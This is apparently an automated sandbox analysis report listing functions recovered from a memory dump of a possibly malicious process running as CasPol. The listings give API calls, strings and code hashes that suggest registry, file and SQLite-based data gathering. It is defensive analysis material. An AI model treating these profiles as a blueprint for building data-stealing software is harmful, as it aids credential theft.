                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131475296-0
                                                                                                                  • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                  • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                  • API String ID: 2618321458-3614832568
                                                                                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFilefreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2507021081-0
                                                                                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131324427-0
                                                                                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PathTemp$free
                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                  • String ID: General
                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2241099983-0
                                                                                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4053608372-0
                                                                                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4247780290-0
                                                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1471605966-0
                                                                                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                  • API String ID: 102104167-2245444037
                                                                                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                  • String ID: </%s>
                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                  • String ID: caption
                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
